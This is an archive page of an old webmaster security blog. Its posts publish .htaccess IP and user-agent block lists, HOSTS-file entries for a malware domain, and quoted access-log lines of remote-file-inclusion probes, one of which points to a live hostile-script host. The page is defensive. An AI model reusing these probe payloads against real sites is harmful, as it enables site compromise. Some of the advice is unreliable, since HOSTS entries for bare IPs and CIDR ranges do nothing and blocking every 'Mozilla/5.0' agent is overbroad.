Blog Home

November 19, 2009

Block trackback spammer operating on Ubiquity Server Solutions

For the past few days I have discovered that a script, or person operating a server farm, at Ubiquity Server Solutions, is attempting to post spam trackbacks to my blog. I don't even allow trackbacks on my blog, for this very reason, yet, this spamming idiot keeps blasting away with his script, ignoring a constant flow of Server 403 (Forbidden) responses. The page that the spammer is trying to POST to is no longer on the blog database, having been deleted in the spring of 2006! So, he is wasting his time and amusing me as I look at all the IP addresses I can add to my Exploited Servers Blocklist.

In fact, I have discovered that this blog trackback spammer is using a server farm assigned to Ubiquity Server Solutions, in Seattle, Washington, USA. Their full assigned CIDR is 64.120.4.0/22, covering IPs ranging from 64.120.4.0 through 64.120.7.255. However, to be fair to this clueless hosting service, the spammer is rotating through a group of servers with IP addresses only in the range of 64.120.5.0 - 64.120.5.255. To minimize possible collateral damage to innocent hosting customers, I am only blocking the narrow range encompassed by the CIDR 64.120.5.0/24.

UPDATE
November 20, 2009

Ubiquity Servers is now hitting MovableType blogs with trackback spam exploit attempts from a different CIDR: 174.34.144.0/23. I have updated the evidence and blocklist rules below to include this new CIDR.

The evidence:

174.34.145.115 - - [19/Nov/2009:12:59:57 -0800] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "tbr/0.1.0"
174.34.145.117 - - [19/Nov/2009:15:16:17 -0800] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "tbr/0.1.0"

64.120.5.197 - - [18/Nov/2009:07:07:08 -0800] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "tbr/0.1.0"
64.120.5.241 - - [18/Nov/2009:07:12:57 -0800] "POST /blogs/2007/08/stupid_blog_trackback_spammers_dont_understa.html HTTP/1.0" 302 378 "-" "tbr/0.1.0"
64.120.5.246 - - [18/Nov/2009:07:32:26 -0800] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "tbr/0.1.0"
64.120.5.254 - - [18/Nov/2009:07:49:48 -0800] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "tbr/0.1.0"
64.120.5.236 - - [18/Nov/2009:08:22:27 -0800] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "tbr/0.1.0"
64.120.5.196 - - [18/Nov/2009:08:30:16 -0800] "POST /blogs/2007/08/stupid_blog_trackback_spammers_dont_understa.html HTTP/1.0" 302 378 "-" "tbr/0.1.0"
64.120.5.225 - - [18/Nov/2009:08:49:54 -0800] "POST /cgi-bin/mt/mt-tb.cgi/18 HTTP/1.0" 403 137 "-" "tbr/0.1.0"

Enough already! You will notice that the spammer is only attempting to POST to two items. One is identified as blog entry number 18, which dates back to May of 2006 and was deleted from my blog in early 2007. The other target of this hapless spammer is an article I wrote about "Stupid Blog Trackback Spammers"not understanding a 403 Forbidden response, when they try to post trackback comments to a blog that has all trackbacks and comments disabled! There are no trackbacks or comments allowed on my blog! Spammers cannot POST anything!

I find this amusing, but others who do allow trackbacks or comments may not be so amused by this a-hole, whom I previously may have traced to Romania. If your website is hosted on an Apache web server, you can serve him a steady diet of Server 403 Forbidden responses by blocking his IP CIDR and his user agent in your public web root .htaccess file, as demonstrated below.



<Files *>
order deny,allow
deny from 64.120.5.0/24
deny from 174.34.144.0/23
</Files>

Options +FollowSymLinks
RewriteEngine On
RewriteOptions inherit
RewriteBase /

RewriteCond %{HTTP_USER_AGENT} ^tbr/0\.1\.0$
RewriteRule .* - [F]



You should determine if legitimate visitors to your blogs are using the tbr/0.1.0 user agent. If so, don't block it. In all likelihood, only spammers use that tool with that version number.

Details about the .htaccess file are found in my extended comments.

Continue reading "Block trackback spammer operating on Ubiquity Server Solutions" »

Get Norton 360 Version 4.0 - All-In-One Security. If you have a non-current version of a Symantec security program and wish to renew your definition updates subscription, or upgrade to a new version at a discount, go to the Norton Product Upgrades & Renewals page.

November 14, 2009

Block server exploit attacks coming from ThePlanet IP space

When it comes to hackers and cyber criminals using leased, co-located, or hijacked web servers to attack other web servers, one of the top culprits I see in my daily access logs is traceable to ThePlanet.com, based in Dallas, Texas. More server attacks originate from their IP addresses during any givien week than from anywhere else. This has been the case for at least three years in a row.

When I say "server attacks" I am referring to attempts to hack a web server, or website, by sending codes to it that are designed to exploit unpatched versions of software commonly used by website owners. Most attempts involve trying to upload or inject a hostile file to a PHP script that is known to be exploitable. These are known a PHP Injection Exploits. Of those targeted scripts, the one that I see almost every day, in my access logs, is the Coppermine Gallery script. Hardly a day goes by that some script kiddie, or hacker, or bot tries to upload or inject hostile files to my server via Coppermine exploits, as demonstrated in the following actual log entry:


70.85.136.34 - - [12/Nov/2009:06:30:02 -0800] "GET //modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://www.masuccessguy.com//audio/swf?? HTTP/1.1" 403 137 "-" "Mozilla/5.0"

We can use DNSStuff or DomainTools to run a WhoIs lookup on that IP address...

WHOIS - 70.85.136.34
Location: United States [City: Dallas, Texas]
OrgName: ThePlanet.com Internet Services, Inc.
NetRange: 70.84.0.0 - 70.87.255.255
CIDR: 70.84.0.0/14

Definition of CIDR
In the above results, the last item shown is the CIDR of the entity in question. CIDR stands for "Classless InterDomain Routing." It is designated by appending a forward slash and number to the end of a starting IP address, to designate an entire range of IPs assigned to that entity. In this case, 70.84.0.0/14 covers all IPs between 70.84.0.0 trough 70.87.255.255.

The CIDR covering ThePlanet.com is shown to be 70.84.0.0/14, but they have other assigned CIDRs that are used by hackers and spammers. All pertinent CIDRs that I have discovered to this date for ThePlanet.com are listed further down in this article, in "deny from" rules, which are referred to as a "blocklist." I have also thrown in IPs belonging to Everyone's Internet and Rackspace, both favorites of spammers and hackers. Any IP address that is covered by one of the CIDRs in the blocklist will get a server 403 Forbidden response, no matter what page they try to view on a website that employs these rules.

Furthermore, I have included a ".htaccess" "Mod_Rewrite" rule to block the exact user agent "Mozilla/5.0" - which is a known hacking tool. Read on and learn to how protect your Apache web server, or Apache hosted websites, from exploit attacks coming from ThePlanet and the like, or Mozilla/5.0 hack tools.

Continue reading "Block server exploit attacks coming from ThePlanet IP space" »

Get Norton 360 Version 4.0 - All-In-One Security. If you have a non-current version of a Symantec security program and wish to renew your definition updates subscription, or upgrade to a new version at a discount, go to the Norton Product Upgrades & Renewals page.

July 18, 2009

Protect your Apache hosted webite from Chinese exploit attacks

While reading my raw access logs I noticed that a lot of the recent exploit attacks hitting my website are coming from China and Korea. I can't say with certainty that the attacks originated in those countries, because they could be coming from compromised servers. Do you care whether an attack originated at the server that is attacking yours? Hell no! If some black hat hacker is commandeering a hundred thousand Chinese servers and using them to attack my servers I block the Chinese IP addresses since they are attacking me.

Here is a typical, recent exploit attempt, coming from a server in China. I have changed the destination URL to example.com for your safety.

218.246.20.221 - - [17/Jul/2009:14:36:29 -0700] "GET //modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://example.com/gboard/rs/copyright.txt? HTTP/1.1" 403 137 "-" "Mozilla/5.0"

If I was running a vulnerable version of the targeted "Coppermine" software, that upload attempt would have yielded a server 200 Success, instead of a 403 Forbidden response. This would have led to the exploitation of my website and hidden iframes would redirect my visitors to hostile destinations. I won't willingly allow that to happen and neither should other webmasters.

So, you ask, how do I block these Chinese servers from attacking my websites? If your websites are hosted on Apache web servers I can offer you two effective means of blocking those exploit probes. The details follow.

Continue reading "Protect your Apache hosted webite from Chinese exploit attacks" »

Get Norton 360 Version 4.0 - All-In-One Security. If you have a non-current version of a Symantec security program and wish to renew your definition updates subscription, or upgrade to a new version at a discount, go to the Norton Product Upgrades & Renewals page.

May 22, 2009

Vulnerabilities roundup for May 18 - 22, 2009

Takeaway

This week has been a headache for the major web software vendors, especially Red Hat Linux and other distributions. Windows users are being targeted by highly critical vulnerabilities in Winamp and Quicktime. Mac users are affected by a flaw in Calendar Objects for Java. So far, between May 18 and 22 there have been at least 85 vulnerability advisories reported by the security investigators at Secunia, 17 of which are rated as "highly critical." I counted at least 7 SQL flaws that can be or are being exploited to inject hostile redirection codes into websites.

Windows Vulnerabilities

On 5/18 /09, Secunia reported an unpatched flaw in Winamp 5.x that can be exploited by malicious people to potentially compromise a user's system. The vulnerability is caused due to the use of vulnerable libsndfile code. Successful exploitation of the vulnerabilities may allow execution of arbitrary code. The vulnerability is confirmed in version 5.552, but other versions may also be affected. Since this vulnerability in currently unpatched, the best advise is to not open untrusted files in Winamp.

A highly critical vulnerability was reported in Apple QuickTime 7.x, on 5/22/09, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to an error in the processing of "0x77" tags within PICT images, which can be exploited to cause a heap-based buffer overflow when the user opens a specially crafted PICT image or visits a malicious web site. This flaw is new and unpatched, so you are advised to not browse untrusted web sites, or open PICT files from untrusted sources.

Read about the vulnerabilities affecting other operating systems and software in my extended comments.

Continue reading "Vulnerabilities roundup for May 18 - 22, 2009" »

Get Norton 360 Version 4.0 - All-In-One Security. If you have a non-current version of a Symantec security program and wish to renew your definition updates subscription, or upgrade to a new version at a discount, go to the Norton Product Upgrades & Renewals page.

May 15, 2009

Securing FormMail scripts against spambots

Takeaway

This is a technical article about securing a Perl "FormMail" script against spammers who attempt to hijack these scripts for use as spam relays. For those not in the know, FormMail, written in the "Perl" scripting language, is one of the original mailer scripts freely available for general use on websites. It is used by millions of webmasters to send email from a web page form. However, unbeknown to many webmasters, older versions of FormMail are totally insecure and can be exploited as spam relays.

History of FormMail

The original version of FormMail was written in 1995 by Matt Wright and was made available for free on his website: Matt's Script Archive. Unfortunately, the early versions of his FormMail script were very insecure and easily turned into spam relays. This fact was seized upon in 2002 by spammers who used bots to scour websites in search of these exploitable scripts, by name or variations thereof. In response, on April 19, 2002, Matt rewrote his FormMail script to secure it better and released it as version 1.91. This was to become the final version of Matt's FormMail. It remains mostly insecure to this day, yet is in use by website owners around the World who haven't learned about the exploits targeting FormMail.

Several years ago I wrote an in depth web article describing the vulnerabilities in Matt's FormMail, partially titled: FormMail Security Vulnerabilities and Solutions, in which I also recommended a drop in secure replacement script known as NMS FormMail, which was developed by a group of calling themselves the London Perl Mongers. My article is still a valuable resource and will bring most webmasters up to speed on what they need to do to protect their websites from FormMail exploiters. Following my recommendations will certainly help to secure any FormMail scripts you may be using. It will also protect your email account(s) from being harvested by creating alias numbers for them, in NMS FormMail, instead of using plain text addresses to submit to. But, there's more you can do that wasn't covered in my original article.

Securing FormMail - 101

One of my recommendations was renaming your FormMail script to something other than its default spelling: formmail.pl. While this makes it a little harder to locate the script for hostile bots it is useless at protecting it against human spammers. All they need to do is to read the source code of your contact, or feedback pages to get the name of the script that processes your forms and mails comments to you. Then they can go after that script by its new name to try to exploit it for use as a spam relay. If it really is an insecure version of Matt's FormMail it will be used as a spam relay! If you are running your website on an Apache web server, as most of us are, there are special codes, called Mod_Rewrite Directives, that can be applied to a particular server file named .htaccess to completely hide the name of the renamed script, protecting it from being used as a spam relay. If you are allowed to add these directives you can make your FormMail script invisible to spammers.

Read the rest of the details in my extended comments.

Continue reading "Securing FormMail scripts against spambots" »

Get Norton 360 Version 4.0 - All-In-One Security. If you have a non-current version of a Symantec security program and wish to renew your definition updates subscription, or upgrade to a new version at a discount, go to the Norton Product Upgrades & Renewals page.

May 1, 2009

Block Ukrainian Malware Server on Eurohost

Yesterday, April 30, 2009, when investigating a problem with an associate's websites, I traced a cross site scripting iframe exploit, pointing to a malware middleman website at tojandglow.com, which redirects victims to a hostile server hosted in the Ukraine by Eurohost LLC. This Ukrainian server is currently dispensing malicious software that includes 9 Trojans, 7 scripting exploits and 1 virus.

The hostile iframe code was injected into the home pages of two related websites by exploiting vulnerabilities in a PHP script used by the webmaster of those websites. The server dispensing the exploits is located at 91.212.65.138, which coincides with the Eurohost home page. The CIDR assigned to Eurohost is 91.212.65.0/24 and you should block access to it in your firewall IP blocking rules, or in your Windows HOSTS file. Examples of how to do both are found below.

Any website that is running php or cgi scripts is in danger of becoming an inadvertent carrier of the redirection iframe that leads your innocent visitors to servers that are rigged to exploit a variety of exploitable vulnerabilities in their browsers, or browser add-ons, plug-ins, or helper objects. Some of the most frequently exploited applications are Internet Explorer (any version prior to 8.0), Adobe Flash, Adobe Reader and Apple Quicktime. Other exploited programs include Apple Safari, Google Chrome and occasionally, Mozilla Firefox. On rare occasions the Opera browser and the Java plug-in are vulnerable to targeted attacks. Firefox and Opera browsers are usually updated very quickly after a vulnerability is reported to their maintainers. Plug-ins usually take longer to update because they have to interact with so many other items and applications.

Webmasters and server administrators, you are responsible for keeping up to date with patches released by software authors, for any applications or scripts that you choose to run on your websites. Information to help you protect your websites and servers from getting exploited by hostile injection probes is in my extended comments.

Individuals browsing the Internet are the real targets of all of these injection attacks. This includes everybody reading this article. You and I have to constantly remain vigilant about threats to our computers' security. New exploits are found every month and are often released in the wild before software authors can respond with patched versions. Those are called zero day exploits. There are several ways to protect your computers from these exploits, including, but not limited to keeping up to date with all Windows, Mac or Linux updates and patches, and patches for commonly exploited third party browser add-ons, like Flash players, PDF Readers, Quicktime and Java plug-ins. Your next line of defense is a combination of security programs encompassing a 2-way firewall, anti-virus and anti-spyware and web threat protection that blocks hostile web pages. Or, you can install one top-notch security suite, like Trend Micro Internet Security and have all these protections and more in just one regularly updated package. There are links to reputable security products in the right sidebar on all of my blog pages.

Windows users have an additional means of protecting their PCs from visiting hostile websites. There is a special file, normally found in (C):\Windows\System32\Etc\, with the unusual file name: HOSTS . Although it has no file extension it can be opened and edited using the built-in Windows Notepad. The HOSTS file takes input in the form of IP addresses and website URLs, separated by a tab or multiple spaces. To protect your computer from being redirected to the hostile tojandglow website, or the Ukrainian server it tries to redirect you to, open your HOSTS file and edit it using these steps.


  1. Using Start > (My) Compute, double-click on the C drive icon, then navigate to your Windows\System32\etc\ folder.

  2. Inside the "etc" folder you should see a file named "Hosts" You may have to unhide system files before this file can be seen. See my extended comments for details on how to do this.

  3. Right-click on the file named HOSTS and choose (left click) Properties

  4. Find the attributes section starting with "READ-ONLY" and uncheck it if it was checked

  5. Click Apply and OK to close the Properties window.

  6. Right-click on HOSTS while holding down the Shift key and select "Open With"

  7. Scroll through the programs list until you find "Notepad" and double-click on it

  8. If Notepad isn't listed you will have to use the browse button to navigate to the Windows folder, where Notepad.exe is located.

  9. With HOSTS open for editing go to the last line in the file and hit ENTER

  10. Add these lines, with a tab after each 127.0.0.1:

    • 127.0.0.1       tojandglow.com

    • 127.0.0.1       91.212.65.138

    • 127.0.0.1       91.212.65.0/24


  11. Click File > Save and in the File Type selection, choose All FIles and save it as HOSTS, without an extension.

  12. Windows may decide to add a .txt extension anyway. If it does, allow this, then right-click on the saved file and delete the .txt extension. Answer the challenge about changing file extensions.


Reboot your computer to make this protection take effect. From that point on any script that tries to redirect you to any of the web addresses listed in the HOSTS file will instead be looped right back to your own computer, commonly referred to as 127.0.0.1, or Local Machine. The injected iframe would display a "page cannot be found" error if it was visible (it isn't; it's only 1x1 pixel!). Do the same anytime a new hostile website or ip address is published.

BTW: If you see any 127.0.0.1 entries referring to microsoft.com in your HOSTS file, remove them! Malware put them there to prevent you from getting Windows Updates or Microsoft security downloads. Ditto for any recognizable security vendors' websites.

Continue reading "Block Ukrainian Malware Server on Eurohost" »

Get Norton 360 Version 4.0 - All-In-One Security. If you have a non-current version of a Symantec security program and wish to renew your definition updates subscription, or upgrade to a new version at a discount, go to the Norton Product Upgrades & Renewals page.

April 14, 2009

Russian Server sending exploit codes. Block 77.221.128.0/19 now!

Many of my regular visitors are aware that I maintain and publish various IP address blocklists, used to protect websites and web servers from nefarious activities by scammers, spammers and exploiters. Today, my website came under attack from a Russian Server, located in Saint Petersburg, Russia. The attacks were server exploit attempts, using various Query strings and http redirects. All were blocked by my security measures, but there were so many attempts in a short period of time that I feel that I should spread the word to other webmasters, before it is too late.

First off, server exploit attempts are nothing new. They happen every day and are easily seen if you read your website's raw access logs or stats. Most exploit attempts are fast in/out probes, usually coming from rotating IP addresses, and only a few at a time. But, the attack I logged this morning was different than the usual model. In a 26 minute period I received 69 exploit probes from the same IP address. I ran a Whois lookup on the IP 77.221.130.5 and found that is it assigned to Server 005 on infobox.ru, in Saint Petersburg, Russia. This is a virtual hosting and colocation data center, who's assigned address range is from 77.221.128.0 - 77.221.143.255, which is designated by the network CIDR: 77.221.128.0/19.

Security-minded webmasters are interested in blocking offending IP addresses and the CIDRs that encompass exploited servers. Most folks running websites are hosted on Apache web servers and are using shared hosting accounts, where they can only use .htaccess file "directives" to block unwanted Internet traffic. Some web hosts may allow only "Mod_Access" directives in user defined .htaccess files. Here is a Mod_Access rule you can add to your .htaccess file to block the offending Russian data center mentioned above:

<Files *>
order deny,allow
deny from 77.221.128.0/19
</Files>

In the above .htaccess directive all IP addresses are permitted access to all files (Files *), except for those IPs included within the CIDR 77.221.128.0/19. This is due to the "order" statement (order deny,allow), where deny is processed before allow. Anything defined in "deny from" rules is processed first. Anything not specifically denied is allowed by default.

I mentioned in the opening paragraph that I publish various IP blocklists (a.k.a. Blacklists). The list that blocks the source of this exploit is called the Russian Blocklist, which includes numerous IP address ranges in Russia, The Ukraine, Turkey and several other former Soviet Union countries. These lists are available in two formats each. The most commonly used format is my .htaccess blocklists and the lesser used type is my iptables blocklists.

Currently, there are four separate blocklists per format. They are the "Chinese" (and Indo-China), "Exploited Servers" (+ proxies), "Nigerian" (and African) and "Russian" (+ Turkey and former Soviet Union) Blocklists. If you use a shared web hosting account you will only be able to use the .htacccess format. If you have a VPS or fully dedicated server you can probably use the iptables blocklists, which require "root" access to the OS. The iptables blocklists deny all access to a server and all of its modules, including email and ftp servers. A .htaccess blocklist can only deny access to http and https traffic. Either type will block the exploit probes listed in my extended comments. The landing pages explain how to use the directives contained in each blocklist.

All of my blocklists are currently free for the taking, but I do appreciate donations if you benefit from my work. You will find PayPal Donate buttons on each blocklist page.

Continue reading "Russian Server sending exploit codes. Block 77.221.128.0/19 now!" »

Get Norton 360 Version 4.0 - All-In-One Security. If you have a non-current version of a Symantec security program and wish to renew your definition updates subscription, or upgrade to a new version at a discount, go to the Norton Product Upgrades & Renewals page.

February 1, 2009

Block server script injection exploits targeting your websites

Server exploits abound!

Enough is enough already! It's bad enough that I have to fend off the occasional exploit attempt against my main website, but 24 in one day, from the same IP address is something I can't ignore, and neither should anybody else who maintains a website. That IP address is 212.241.182.240, which is a dedicated server that belongs to Pipex Dedicated Hosting (and associates), in Great Britain (See Whois report). This is an exploited server and it is hostile to other servers and websites!

Here is a sample of just one of the many attacks launched by this server, against mine (I deactivated the hyperlink to the hostile script, substituting an * for a t):

212.241.182.240 - - [01/Feb/2009:02:44:23 -0800] "GET /?sIncPath=ht*p://kadin.or.id/mail/id1.txt?? HTTP/1.1" 403 137 "-" "Mozilla/5.0"

What's this all about, you ask? It's about somebody who is leasing a dedicated server and either knowingly or unknowingly using it to blast out hostile exploitation scripts against other servers. This exploit is trying to upload a file named id1.txt into my website, via some vulnerability in a script that might be running on it (didn't happen - see the 403 response). Normally I wouldn't even assume that the people leasing the server had any knowledge of such goings on, but this time something is different. In just about every other instance of script injection attempts, when I trace the IP to a server and try to access it, I usually see one of the following responses:

  1. A website's home page (index.html, index.php, etc.)
  2. A "Welcome to Apache" screen, for a new website on an Apache server
  3. A Welcome to cPanel or WHM screen
  4. A welcome screen for an unconfigured website hosted on a Windows IIS server
  5. A 403 Forbidden message (someone doesn't want me poking around)
  6. A message that no website has yet been configured on the server

Today, when I went to investigate the IP address that was spewing out 24 exploit attempts in one day, instead of one of the above listed typical responses, all I saw was a login field, requesting a user name and password. This is a password protected website and it is being used to exploit other websites and web servers. Nobody can access any of it's pages, or inject hostile scripts into it without logging in with the correct credentials. Maybe this server used a weak password and user name combination that was cracked with a dictionary or rainbow attack, or maybe the administrator was tricked into allowing a keylogger to infect his or her personal computer (used to login to his/her website), or maybe the owner is knowingly using this server to launch exploit attacks against other servers, like mine.

Whatever the case may be, this server is out to get us and if you run a website you may want to block it for your website's protection. I will give you several methods of denying access to this server and others launching similar exploits, in my extended comments.

Continue reading "Block server script injection exploits targeting your websites" »

Get Norton 360 Version 4.0 - All-In-One Security. If you have a non-current version of a Symantec security program and wish to renew your definition updates subscription, or upgrade to a new version at a discount, go to the Norton Product Upgrades & Renewals page.

November 24, 2008

Wizcrafts has a new web host: LunarPages

After having my websites hosted by Bluehost for two years I have had to make a business decision and change web hosting companies. Note, this decision was based solely on price, not any problems with the service. My web hosting renewal date is fast approaching and as it turns out the cost of renewing my annual hosting contract had gone up, rather than down. Despite contacting the sales department at Bluehost they were unwilling to negotiate with me, so I looked around for a while and decided to switch my websites to LunarPages, on their Basic hosting package. Instead of having to pay out almost $108 for another year at Bluehost, I am paying just under $60 to LunarPages; almost half the annual price! Normally, this hosting would cost $6.95 a month (still $2.00/month cheaper than Bluehost's 1 year renewal rate), but I got this deal because LunarPages is running a Fall Special rate of only $4.95 per month, annually, for new accounts. In these tough economic times I had to get the best price, along with excellent service, and that's what LunarPages offers.

Let's get to the specifics and compare LunarPages hosting to Bluehost. Both now offer unlimited disk space and data transfer (a.k.a "Bandwidth"). If I would have had to rewrite my entire website to accommodate the new host I wouldn't have made the change, even to save the $48.00. But, I didn't have to change a single script, or file location. Everything works on LunarPages exactly the same as it did on Bluehost! There is a slight difference between the cPanel features on LunarPages, but nothing monumental and nothing I require for normal operation. In fact, get this, after recreating just the POP3 email accounts, Using the "Backup" icon on both cPanels, I was able to export my email forwarding accounts and spam filters from Bluehost to G-zipped files on my computer, then import those same files into my new account on LunarPages, and voila, my 50+ email forwarding (alias) accounts and custom mail filters were loaded and ready to go! Uploading all of my website files and folders took a bit of time (at about 40 KB/sec. max.), but went smoothly and flawlessly. In all there was just under a gigabyte uploaded to the new server. Then, I recreated the database and super-user for my MovableType blog, exported the database from Bluehost, imported it into LunarPages (using the Backup page icon), and Bam, there was my blog! Then I went back into cPanel and inputted my "add-on" domains and they became separate websites. My parked domains similarly became parked on my main site at LunarPages, just like they were on BlueHost.

I am an activist Webmaster and spam fighter and I don't tolerate log or blog spammers at all. I have developed some really advanced spam and exploit detection and blocking rules that I apply in my .htaccess files and all of those rules work exactly the same on LunarPages as they did on BlueHost. These rules include certain ip based blocklists that I publish for others to use to protect their websites from spammers, scammers and exploiters in various unfriendly countries. Each blocklist is available in both .htaccess and iptables formats. If you have an Apache server based website and are being troubled by Exploited Servers, Nigerian scammers, Russian spammers, or Chinese hackers, take a look at my .htaccess, or iptables blocklists.

I use a CGI hit counter and run the counter script in a special directory, not the cgi-bin. Both BlueHost and LunarPages allow CGI scripts to run in any directory you want, after you CHMOD the Perl scripts to "755." Oh yeah, "XBitHack Full" in .htaccess works on LunarPages, if you set the X bit to executable (744).

LunarPages supplies a means of accessing your website before it goes live, so I was able to test all functions to make sure I hadn't forgotten anything. Of course I did forget to CHMOD a few miscellaneous executable files, which took a couple of minutes to locate and correct. After everything tested correctly I logged into Dotster, my Domain Registrar, where I changed the primary and secondary Name Servers from BlueHost to LunarPages. I changed the last modified date in the JavaScript include file used in the footer of every page then uploaded that just to LunarPages, leaving the last modified date as it was on BlueHost. Within a half hour my website was loading from LunarPages, showing the new last modified date! It took two days for the DNS change to traverse throughout the Internet, after which the entire World was seeing my new web host location. I left the files up on BlueHost for the couple of last stragglers that were still being routed there. They can serve as an emergency backup mirror, in case LunarPages was to suffer an outage before my BlueHost account expires next month.

Unlimited storage and bandwidth for $4.95/mo!
That's pretty much it. I am totally satisfied with my decision to make the switch to LunarPages as my website hosting company. I still get all of my mail, to all of the accounts I had before. All forwarding accounts work, as do the site-wide cPanel spam filters I wrote. My CGI scripts do what they are supposed to do, the counters count, the includes are included. The only thing that is really different is that I am paying almost half the price for the same features, with the same 99.9% uptime guarantee. Don't let anybody fool you about uptime; all shared hosting servers will eventually suffer downtime because of any number of reasons. Sometimes the server I was on went dark due to the failure of the RAID cards, sometimes due to overload of the CPU, or due to DDoS attacks on one of the hundreds of websites hosted on that server. Shit happens! I can't afford to pay for dedicated hosting for my websites, so I accept a little downtime here and there. Time will tell if LunarPages servers are any more resilient than BlueHost's servers. If not, I will certainly let y'all know about it on my blog.

I wrote a web page describing the LunarPages hosting packages and features of the Basic hosting account and invite you to read it. Right now they are still running the Fall Special price of only $4.95 per month, for one or two year contracts. If you need a new hosting company and want to save money, but still get real telephone support, please give them a try. They have a 30 day full money back guarantee if you aren't satisfied. I had one chance to call support with a question about the server I was on. The phone was answered by an automated routing machine. I pressed the key to route to technical support and somebody in the USA picked up the phone after two rings. Just call 1-877-LUNARPAGES if you need phone support for USA and Canada. For the United Kingdom, call 0800-072-9150 instead. If you live outside of these countries, you cannot dial the toll free number. They provide another support line for their international customers: 1-714-521-8150.

Get Norton 360 Version 4.0 - All-In-One Security. If you have a non-current version of a Symantec security program and wish to renew your definition updates subscription, or upgrade to a new version at a discount, go to the Norton Product Upgrades & Renewals page.

November 8, 2008

.htaccess blocklist addition for prolific access log spammer

Today I reviewed my daily access log for this website, and I discovered a large number of repeated attempts to spam my access log, all coming from the IP address: 64.182.124.212. The spam attempt was referrer field entries for a medial search engine and a social networking and dating website.

The IP address 64.182.124.212 belongs to a web hosting company known as CI Host, and is assigned to hosting customer PacificAir.com, an amateur looking website. The spamvertised websites in the referrer field look just as amateur as the PacificAir website and are hosted on the same server. The IP range assigned to CI Host is 64.182.0.0 through 64.182.255.255, or in CIDR notation: 64.182.0.0/16.

The way I respond to attempts to spam my access logs is that I place the offending IP address, and/or CIDR of their hosting company, on my published IP blocklists. I did just that, placing the CIDR 64.182.0.0/16 on my Exploited Servers Blocklist. If you are getting spammed from the IP address 64.182.124.212 and want to block them in your .htaccess file, on your Apache Hhosted website, just add one of the following rules to a section labeled <Files *>:

<Files *>
order deny,allow
deny from 64.182.124.212
</Files>

If, like me, you decide to block the entire ISP/web hosting company, use this rule:

<Files *>
order deny,allow
deny from 64.182.0.0/16
</Files>

NOTE:
If you have your website hosted by CI Host please read the warning in my extended comments!

Continue reading ".htaccess blocklist addition for prolific access log spammer" »

Get Norton 360 Version 4.0 - All-In-One Security. If you have a non-current version of a Symantec security program and wish to renew your definition updates subscription, or upgrade to a new version at a discount, go to the Norton Product Upgrades & Renewals page.

July 7, 2008

Stupid Russian Blog Spammers Still Wasting Their Time

"Stupid Russian Blog Spammers Still Wasting Their Time" makes for a catchy, surreal title, but it's true. The same country that produced the brilliant criminal masterminds behind the Storm and Grisbi Worms has also produced some of the stupidest blog spammers to ever set finger to keyboard!

Let me explain what I am referring to regarding stupid blog spammers. First of all, look up in the upper right corner of this blog, just under the Google search field. Here's what it says in capital letters: "SORRY: NO COMMENTS, NO TRACKBACKS!" That should be self explanatory to almost anybody who can read English words, including people intent on spamming a blog such as this one, using English words. You know the crap I'm talking about; links to buy unlicensed or illegal drugs or herbal solutions, to cure "ED" or enlarge one's "natural size." When I first started this blog I did allow trackbacks and comments and that is what I was getting submitted, all in English and all traced to Russian and Ukrainian IP addresses.

As soon as I realized that only blog spammers were trying to comment on my blog I decided to disable the codes and modules that allowed comments and trackbacks. Still, these idiots in Russia and the Ukraine continued trying to POST comments and trackbacks to the now disabled modules that used to handle those functions. This led me to write three articles about these incidents, during the spring and summer of 2007. Their names and links to them are as follows:


  1. Stupid Blog Trackback Spammers Don't Understand Server 403 Responses

  2. Russian and Ukrainian Blog Spammers are STUPID!

  3. Blog spammers still wasting their time tying to spam this unspammable blog


I wrote those articles about a year ago, yet, I still see daily access log entries being blocked with server 403 responses, belonging to Russian IP addresses trying to POST spam comments or Trackbacks to this blog. It is obvious that these spammers are using scripts, but, being stupid spammers they don't bother to verify if those scripts are being allowed to complete their submissions, or check my blog to see if their comments were even posted. I'll bet somebody is paying these idiots to send blog spam for them and they are ripping off the guys with the money. If my blog is any indication of their lack of any level of intelligence, then I am guessing that they are having a similar lack of success trying to spam your blogs. Still, some of their attempts may work on unsecured servers.

Anyway, insults to the enemy aside (it feels good though!), I never see the comments they are typing, just an access log entry containing a 403 Forbidden, or 302 redirect back to their own websites (lol). My Apache-based, shared-hosting web server is protected with a custom ".htaccess" file that contains my entire, now-famous, "Russian Blocklist!" Many webmasters are using this blocklist to keep Russian and Turkish spammers and hackers from accessing their web sites.

If your web site and blog is hosted on a shared Apache/Linux based web server and you want to block access to IP addresses in the former Soviet Union and Turkey, just download my Russian .Htaccess Blocklist and either use it as your new .htaccess file, or merge the "deny from" list into your existing .htaccess. Full instructions are included on my .htaccess blocklists landing page and on each blocklist page. The landing page has links to all of my existing .htaccess IP blocklists (Chinese, Nigerian, Russian and Exploited Servers), as well as my iptables Linux firewall blocklist equivalents.

An actual access log entry and codes you can use to block web site access to these people, are in my extended content.

Continue reading "Stupid Russian Blog Spammers Still Wasting Their Time" »

Get Norton 360 Version 4.0 - All-In-One Security. If you have a non-current version of a Symantec security program and wish to renew your definition updates subscription, or upgrade to a new version at a discount, go to the Norton Product Upgrades & Renewals page.

May 22, 2008

Steel Guitar Forum Goes Offline Temporarily

Steel Guitar Forum goes offline.

On May 19, 2008, the external RAID hard disk drive unit powering the popular website - The Steel Guitar Forum (SGF) - suffered a catastrophic failure, taking the entire website offline. It remains offline as of May 22, 2008, while a new RAID setup is being installed and data recovery attempted. We are hoping to have the server back online as soon as possible, with as little data loss as possible. As many of you already know I do security for the SGF and act as moderator of the "Computers" section of the forum. I have assisted the owner/Administrator, Bobby Lee Quasar, in procuring a suitable replacement.

